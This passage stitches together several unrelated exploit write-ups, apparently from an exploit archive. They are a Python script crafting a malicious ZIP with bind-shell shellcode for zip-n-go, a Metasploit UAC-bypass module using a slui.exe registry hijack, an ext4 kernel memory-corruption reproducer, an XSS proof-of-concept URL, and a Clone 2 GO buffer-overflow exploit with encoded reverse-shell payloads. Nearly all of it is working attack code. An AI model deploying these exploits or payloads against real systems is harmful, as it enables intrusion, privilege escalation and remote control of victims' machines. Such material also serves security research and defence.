shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58"
shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76"
shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32"
shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37"
shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f"
shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b"
shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48"
shellcode += "\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75"
shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79"
shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56"
shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d"
shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71"
shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66"
shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36"
shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76"
shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f"
shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e"
shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58"
shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b"
shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76"
shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c"
shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30"
shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52"
shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55"
shellcode += "\x41\x41"
####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00' # general purpose bit flag
LocalFileHeader += '\x00\x00' # compression method
LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += '\x00\x00' # extra field length
LocalFileHeader += '\x00' # file name
#LocalFileHeader += '\x00' # extra filed
################## Central Directory File Header ##################
CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature
CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += '\x00\x00' # general purpose bit flag
CDFileHeader += '\x00\x00' # compression method
CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader += '\x00\x00\x00\x00' # CRC-32
CDFileHeader += '\x00\x00\x00\x00' # compressed size
CDFileHeader += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += '\x00\x00' # extra field length
CDFileHeader += '\x00\x00' # file comment length
CDFileHeader += '\x00\x00' # disk number where file starts
CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += '\x24\x00\x00\x00' # external file attributes
CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader += '\x00' # file name
#CDFileHeader += '\x00' # extra field
#CDFileHeader += '\x00' # file comment
################ End of Central Directory Record ##################
EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader += '\x00\x00' # number of this disk
EOCDRHeader += '\x00\x00' # disk where central directory starts
EOCDRHeader += '\x01\x00' # number of central directory records on this disk
EOCDRHeader += '\x01\x00' # total number of central directory records
EOCDRHeader += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes
EOCDRHeader += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += '\x00\x00' # comment length
#EOCDRHeader += '\x00' # comment
Witchcraft = '\x54' # PUSH ESP * save stack pointer
Witchcraft += '\x5F' # POP EDI
Witchcraft += '\x54' # PUSH ESP * calculate offset for decoder
Witchcraft += '\x58' # POP EAX
Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111
Witchcraft += '\x05\x11\x21\x11\x11' # ADD EAX,11112111
Witchcraft += '\x2D\x53\x25\x22\x22' # SUB EAX,22222553
Witchcraft += '\x50' # PUSH EAX
Witchcraft += '\x5C' # POP ESP
#https://github.com/ihack4falafel/Slink
#root@kali:/opt/Slink# python Slink.py * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
#Enter your shellcode: 9089FC89F8058C050000FFE0
#[+] Shellcode size is divisible by 4
#[+] Encoding [e0ff0000]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x11\x11\x77\x61" ## add eax, 0x61771111
Witchcraft += "\x05\x11\x11\x66\x51" ## add eax, 0x51661111
Witchcraft += "\x05\x11\x11\x55\x61" ## add eax, 0x61551111
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
#[+] Encoding [058c05f8]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x74\x13\x46\x13" ## add eax, 0x13461374
Witchcraft += "\x05\x64\x13\x45\x13" ## add eax, 0x13451364
Witchcraft += "\x05\x53\x12\x34\x12" ## add eax, 0x12341253
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
#[+] Encoding [89fc8990]..
#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Witchcraft += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Witchcraft += "\x05\x41\x44\x76\x44" ## add eax, 0x44764441
Witchcraft += "\x05\x41\x44\x65\x44" ## add eax, 0x44654441
Witchcraft += "\x05\x41\x34\x54\x34" ## add eax, 0x34543441
Witchcraft += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Witchcraft += "\x50" ## push eax
Evil = '\x41' * 3066 # offset to shellcode
Evil += shellcode # bind shell
Evil += '\x43' * (716-len(shellcode)) # shellcode host
Evil += Witchcraft # magic!
Evil += '\x42' * (126-len(Witchcraft)) # witchcraft host
Evil += '\x74\x80\x75\x80' # nSEH - short jump backward (jump net)
Evil += '\x6e\x4c\x40\x00' # SEH - pop ecx, pop ebp, retn in zip-n-go.exe
Evil += '\x41' * (4064-3908-4-4)
Evil += '.txt'
buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader
try:
f=open("Evil.zip","w")
print "[+] Creating %s bytes evil payload.." %len(Evil)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::Powershell
include Post::Windows::Priv
include Post::Windows::Registry
include Post::Windows::Runas
SLUI_DEL_KEY = "HKCU\\Software\\Classes\\exefile".freeze
SLUI_WRITE_KEY = "HKCU\\Software\\Classes\\exefile\\shell\\open\\command".freeze
EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
SLUI_PATH = "%WINDIR%\\System32\\slui.exe".freeze
CMD_MAX_LEN = 16383
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)',
'Description' => %q{
This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under
the Current User hive, and inserting a custom command that will get invoked when any binary
(.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable
to file handler hijacking. When we run slui.exe with changed Registry key
(HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin
instead of slui.exe.
The module modifies the registry in order for this exploit to work. The modification is
reverted once the exploitation attempt has finished.
The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting the
payload in a different process.
},
'License' => MSF_LICENSE,
'Author' => [
'bytecode-77', # UAC bypass discovery and research
'gushmazuko', # MSF & PowerShell module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
['Windows x86', { 'Arch' => ARCH_X86 }],
['Windows x64', { 'Arch' => ARCH_X64 }]
],
'DefaultTarget' => 0,
'References' => [
[
'URL', 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation',
'URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1'
]
],
'DisclosureDate' => 'Jan 15 2018'
)
)
end
def check
if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled?
CheckCode::Appears
else
CheckCode::Safe
end
end
def exploit
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
commspec = 'powershell'
registry_view = REGISTRY_VIEW_NATIVE
psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
# Make sure we have a sane payload configuration
if sysinfo['Architecture'] == ARCH_X64
if session.arch == ARCH_X86
# On x64, check arch
commspec = '%WINDIR%\\Sysnative\\cmd.exe /c powershell'
if target_arch.first == ARCH_X64
# We can't use absolute path here as
# %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
psh_path = "powershell.exe"
end
end
if target_arch.first == ARCH_X86
# Invoking x86, so switch to SysWOW64
psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
end
else
# if we're on x86, we can't handle x64 payloads
if target_arch.first == ARCH_X64
fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
end
end
if !payload.arch.empty? && (payload.arch.first != target_arch.first)
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
end
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
payload_value = rand_text_alpha(8)
psh_path = expand_path(psh_path)
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
if psh_payload.length > CMD_MAX_LEN
fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
end
psh_stager = "\"IEX (Get-ItemProperty -Path #{SLUI_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
existing = registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
exist_delegate = !registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?
if existing.empty?
registry_createkey(SLUI_WRITE_KEY, registry_view)
end
print_status("Configuring payload and stager registry keys ...")
unless exist_delegate
registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
end
registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
registry_setvaldata(SLUI_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
# Calling slui.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
cmd_path = expand_path(commspec)
cmd_args = expand_path("Start-Process #{SLUI_PATH} -Verb runas")
print_status("Executing payload: #{cmd_path} #{cmd_args}")
# We can't use cmd_exec here because it blocks, waiting for a result.
client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true)
# Wait a copule of seconds to give the payload a chance to fire before cleaning up
# TODO: fix this up to use something smarter than a timeout?
sleep(3)
handler(client)
print_status("Cleaining ...")
unless exist_delegate
registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
end
if existing.empty?
registry_deletekey(SLUI_DEL_KEY, registry_view)
else
registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
end
registry_deleteval(SLUI_WRITE_KEY, payload_value, registry_view)
end
def check_permissions!
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
print_status('UAC is Enabled, checking level...')
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
end
ext4 can store data for small regular files as "inline data", meaning that the
data is stored inside the corresponding inode instead of in separate blocks.
Inline data is stored in two places: The first 60 bytes go in the i_block field
in the inode (which normally contains a list of blocks instead), the rest goes
in the special filesystem-internal extended attribute "system.data".
Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can
store extended attribute values not only inline in the inode, but can also store
such values in dedicated inodes.
When a corrupted filesystem stores the system.data extended attribute value in a
dedicated inode, the kernel gets confused, causing memory corruption.
ext4_find_inline_data_nolock() attempts to locate an inode's inline data by
searching for the system.data xattr using ext4_xattr_ibody_find().
If the inode has xattrs, ext4_xattr_ibody_find() first checks them for
corruption using xattr_check_inode(), then grabs the wanted xattr using
xattr_find_entry().
xattr_check_inode() uses ext4_xattr_check_entries() to check the individual
xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr
whose value is in a dedicated inode) - only for inline values, length and offset
checks are performed to ensure that the value actually fits into the inode.
The problem is that ext4_find_inline_data_nolock() then assumes that the
returned xattr uses inline storage and that the returned length will fit into
the inode; it stores the length field from the xattr in
`EXT4_I(inode)->i_inline_size` without further checks.
Later, when the file is read, ext4_read_inline_data() trusts this length value,
causing an out-of-bounds memcpy() in the following line:
memcpy(buffer,
(void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len);
To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on:
1. Create a new ext4 filesystem image, with 256-byte inodes and inline data
support:
$ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k
mke2fs 1.43.7 (16-Oct-2017)
Creating regular file testfs.img
Filesystem too small for a journal
Creating filesystem with 100 4k blocks and 64 inodes
Allocating group tables: done
Writing inode tables: done
Writing superblocks and filesystem accounting information: done
2. Create a 75-byte file in the new filesystem:
$ mkdir mount
$ sudo mount testfs.img mount
$ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile
1+0 records in
1+0 records out
75 bytes copied, 0.000811554 s, 92.4 kB/s
$ sudo umount mount
3. Bump up the inode size, bump up the xattr size, and mark the xattr value as
non-inline:
$ cat fixup.c
#include <stdint.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#define __le16 uint16_t
#define __le32 uint32_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u8 uint8_t
/* some definitions from kernel headers */
#define EXT4_NDIR_BLOCKS 12
#define EXT4_IND_BLOCK EXT4_NDIR_BLOCKS
#define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1)
#define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1)
#define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1)
#define EXT4_XATTR_MAGIC 0xEA020000
struct ext4_inode {
__le16 i_mode;
__le16 i_uid;
__le32 i_size_lo;
__le32 i_atime;
__le32 i_ctime;
__le32 i_mtime;
__le32 i_dtime;
__le16 i_gid;
__le16 i_links_count;
__le32 i_blocks_lo;
__le32 i_flags;
union {
struct {
__le32 l_i_version;
} linux1;
} osd1;
__le32 i_block[EXT4_N_BLOCKS];
__le32 i_generation;
__le32 i_file_acl_lo;
__le32 i_size_high;
__le32 i_obso_faddr;
union {
struct {
__le16 l_i_blocks_high;
__le16 l_i_file_acl_high;
__le16 l_i_uid_high;
__le16 l_i_gid_high;
__le16 l_i_checksum_lo;
__le16 l_i_reserved;
} linux2;
} osd2;
__le16 i_extra_isize;
__le16 i_checksum_hi;
__le32 i_ctime_extra;
__le32 i_mtime_extra;
__le32 i_atime_extra;
__le32 i_crtime;
__le32 i_crtime_extra;
__le32 i_version_hi;
__le32 i_projid;
};
struct ext4_xattr_ibody_header {
__le32 h_magic;
};
struct ext4_xattr_entry {
__u8 e_name_len;
__u8 e_name_index;
__le16 e_value_offs;
__le32 e_value_inum;
__le32 e_value_size;
__le32 e_hash;
char e_name[0];
};
#define INODE_SIZE 256
#define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) )
int main(int argc, char **argv) {
char *path = argv[1];
int fd = open(path, O_RDWR);
if (fd == -1) err(1, "open");
struct stat st;
if (fstat(fd, &st)) err(1, "fstat");
char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (map == MAP_FAILED) err(1, "mmap");
for (int i=0; i<st.st_size/INODE_SIZE; i++) {
struct ext4_inode *ino = (void*)(map + i * INODE_SIZE);
if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue;
printf("found inode (idx=%d, size=%u, mode=%ho)\n",
i, ino->i_size_lo, ino->i_mode);
ino->i_size_lo = 60000;
printf(" i_extra_isize = %hu\n", ino->i_extra_isize);
struct ext4_xattr_ibody_header *hdr =
(void*)( ((char*)ino)+128+ino->i_extra_isize );
if (hdr->h_magic != EXT4_XATTR_MAGIC) continue;
struct ext4_xattr_entry *entry = (void*)(hdr+1);
while (*(uint32_t*)entry != 0) {
printf(" attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n",
entry->e_name_index, entry->e_name_len, entry->e_name,
entry->e_value_offs, entry->e_value_inum, entry->e_value_size);
entry->e_value_offs = 0;
entry->e_value_inum = 20;
entry->e_value_size = 60000;
entry = (void*)(
(char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4)
);
}
}
}
$ gcc -o fixup fixup.c -Wall
$ ./fixup testfs.img
found inode (idx=555, size=75, mode=100644)
i_extra_isize = 32
attr: idx=7 name='data' offs=76 inum=0 size=15
4. Use fsck to fix up the inode checksum (but don't let it fix anything else!):
$ fsck.ext4 -f testfs.img
e2fsck 1.43.7 (16-Oct-2017)
Pass 1: Checking inodes, blocks, and sizes
Inode 12 has INLINE_DATA_FL flag but extended attribute not found. Truncate<y>? no
Extended attribute in inode 12 has a value size (60000) which is invalid
Clear<y>? no
Inode 12 passes checks, but checksum does not match inode. Fix<y>? yes
Pass 2: Checking directory structure
Pass 3: Checking directory connectivity
Pass 4: Checking reference counts
Pass 5: Checking group summary information
testfs.img: ***** FILE SYSTEM WAS MODIFIED *****
testfs.img: ********** WARNING: Filesystem still has errors **********
testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks
5. Mount the filesystem again:
$ sudo mount testfs.img mount
6. Read the file:
$ hexdump -C mount/testfile
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000030 00 00 00 00 00 00 00 00 00 00 00 00 04 07 00 00 |................|
00000040 14 00 00 00 60 ea 00 00 00 00 00 00 64 61 74 61 |....`.......data|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000004a0 31 00 00 00 00 00 00 00 e0 d1 fc 98 d7 7f 00 00 |1...............|
000004b0 e0 07 03 99 d7 7f 00 00 00 00 00 00 00 00 00 00 |................|
000004c0 00 00 00 00 00 00 00 00 e0 5f 00 00 00 00 00 00 |........._......|
000004d0 64 00 00 00 00 00 00 00 f0 af 02 99 d7 7f 00 00 |d...............|
000004e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
[...]
7. Check dmesg:
$ dmesg
[...]
[ 3211.552729] ==================================================================
[ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922
[ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7
[ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016
[ 3211.552799] Call Trace:
[ 3211.552807] dump_stack+0x71/0xab
[ 3211.552813] print_address_description+0x6a/0x250
[ 3211.552817] kasan_report+0x258/0x380
[ 3211.552863] ? ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552867] memcpy+0x34/0x50
[ 3211.552914] ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552961] ext4_read_inline_page+0x1e4/0x2a0 [ext4]
[ 3211.553006] ? ext4_read_inline_data+0x120/0x120 [ext4]
[ 3211.553053] ext4_readpage_inline+0x13e/0x160 [ext4]
[ 3211.553101] ext4_readpage+0xf5/0x110 [ext4]
[ 3211.553106] generic_file_read_iter+0x9a4/0xea0
[ 3211.553112] ? filemap_range_has_page+0x160/0x160
[ 3211.553116] ? save_stack+0x89/0xb0
[ 3211.553120] ? __kasan_slab_free+0x105/0x150
[ 3211.553124] ? aa_path_link+0x1f0/0x1f0
[ 3211.553128] ? do_syscall_64+0x150/0x160
[ 3211.553132] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 3211.553137] ? audit_watch_compare+0x1b/0x50
[ 3211.553142] __vfs_read+0x239/0x340
[ 3211.553145] ? __x64_sys_copy_file_range+0x2d0/0x2d0
[ 3211.553149] ? dput.part.19+0x2e/0x1b0
[ 3211.553154] ? auditd_test_task+0x43/0x60
[ 3211.553158] vfs_read+0xa5/0x190
[ 3211.553162] ksys_read+0xa1/0x120
[ 3211.553166] ? kernel_write+0xa0/0xa0
[ 3211.553171] do_syscall_64+0x6d/0x160
[ 3211.553175] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 3211.553178] RIP: 0033:0x7f9ada1af72c
[ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
[...]
[ 3211.553197] The buggy address belongs to the page:
[ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0
[ 3211.553207] flags: 0x17fffc000000021(locked|lru)
[ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff
[ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0
[ 3211.553222] page dumped because: kasan: bad access detected
[ 3211.553224] page->mem_cgroup:ffff8803cf31cac0
[ 3211.553229] Memory state around the buggy address:
[ 3211.553234] ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3211.553238] ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553246] ^
[ 3211.553250] ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553254] ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553257] ==================================================================
# Exploit Title: EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting
# Date: 2018-06-01
# Exploit Author: Chris Barretto
# Vendor Homepage: https://www.emssoftware.com/
# Software Link: https://docs.emssoftware.com/Content/V44.1_ReleaseNotes.htm
# Version: Versions prior to 8.0.0.201805210 are vulnerable
# Tested on: Master Calendar v8.0.0.127
# CVE : CVE-2018-11628
# 1. Description:
# Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters are not properly sanitized,
# allowing malicious attackers to send a crafted URL and execute code in the context of the user's browser.
#2. Proof of concept:
# The following PoC URL is available:
https://example.com/MasterCalendar/RssFeeds.aspx?Name=abc<script>alert('XSS')</script>xyz
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------------------#
# Exploit Title : Clone 2 GO Video converter 2.8.2 Unicode Buffer Overflow (Remote Code Execution) #
# Exploit Author : Gokul Babu #
# Organisation : Arridae Infosec P.V Ltd #
# Vendor Homepage : http://www.clone2go.com/products/videoconverter.php #
# Vulnerable Software: http://www.clone2go.com/down/video-converter-setup.exe #
# Tested on : Windows-7 64-bit(eip-828)(Other windows versions also vulnerable Only Eip overwrite will change #
# Steps to reproduce : Open the evil.txt paste the contents in Options -> Set output folder -> Browse #
#----------------------------------------------------------------------------------------------------------------------#
#payload generation method
#msfpayload windows/exec CMD=calc.exe R > calc.raw
#./alpha2 eax --unicode --uppercase < calc.raw
#seh-"004d00b3"
#\x73-venetian pad(other things didn't work)
#248 bytes of padding before shellcode is required which is 124 bytes in Unicode
#EAX register is used for operation
seh= "\x41\x73" + "\xb3\x4d"
operation="\x73\x53\x73\x58\x73\x05\x0b\x01\x73\x2d\x02\x01\x73\x50\x73\xc3" + "\x90"*124
shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK83YKPKPKPS0TIYUNQ8RC4TKPRP0TK0RLL4KPRLT4KRRNHLOWGPJMVNQKO01GP6LOLQQCLM2NLMPWQXOLMKQ97IRL0PR0W4K22LP4KOROLKQ8P4KOP2XU5WP2TPJKQXPPPDKPHMHTK28MPKQXSK3OLOYTKP4TKKQXVNQKONQWP6LY1XOLMKQWW08K0RUL4M3SMZXOK3MNDBUIRQH4KB8MTKQXSBFDKLLPKTK0XMLM1IC4KKTDKM1HPSY14MTNDQKQKQQ0YPZR1KOIPQHQO1J4KLRJKE6QMRJKQTMU5VYKPM0M0PPS801TKROTGKOJ57KJP7EUR1FQXW6TUGM5MKOXUOLLFSLLJSPKK9P2UM57KOWN3T2BOBJKP1CKO8UQSC1RL2CKPA")
#msfpayload windows/shell_reverse_tcp LHOST=172.20.10.3 LPORT=4444 R > reverse.raw
#./alpha2 eax --unicode --uppercase < reverse.raw
reverse=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKL9X3YM0KPKPQPTIYUNQYBQTDKR2NPTKPRLL4KQBMDTKBRMXLOVWOZMVP1KONQWP6LOLQQSLKRNLMPWQXOLMM1Y7YRL022B7TKPRLPDKOROLKQHPDKOP2XCUY044OZKQJ00PTKOXN84KPXMPKQ9CK3OLQ9TKNT4KKQZ6P1KONQ7P6LWQHOLMKQ97OHIPBUJTM3SMKHOK3MNDRUK2R84KQHNDKQZ3S64KLL0KTKR8MLKQICTKM44KKQHPDIOTO4O4QKQK1Q0YPZPQKOK0QH1O1JTKLRZKDF1MS8NSNRKPKP1XT7BSNR1O0TQXPLCGMVKWKO8UFX4PKQKPKPMY940TPPBHO9502KKPKO9EPP0P20PPOPR0OP0P1XJJLO9O9PKO8UTIXGRH6LN4LJLCQXLBM0LQQLDI9VQZLPPVPW1XTYEUT4QQKOJ5BHQSBMQTM0U9JCR7270WP1JV1ZMBPYR6YRKM1VY7PDNDOLKQM1TMOTO4LPGVKPQ4PTPPB6PVPVOVB60NPVPV0SPVRH2Y8LOO3VKO9ESYK00NR6OVKO00S8LHDGMMQPKOXUGKJPVUVBPVRH76TUWMUMKOJ5OLKVSLLJ3PKKYPT5KUWKOWMCRRRO1ZKPPSKOZ5A")
buf="A"*828 + seh + operation + shellcode + "D"*(4164-len(operation) -len(shellcode))
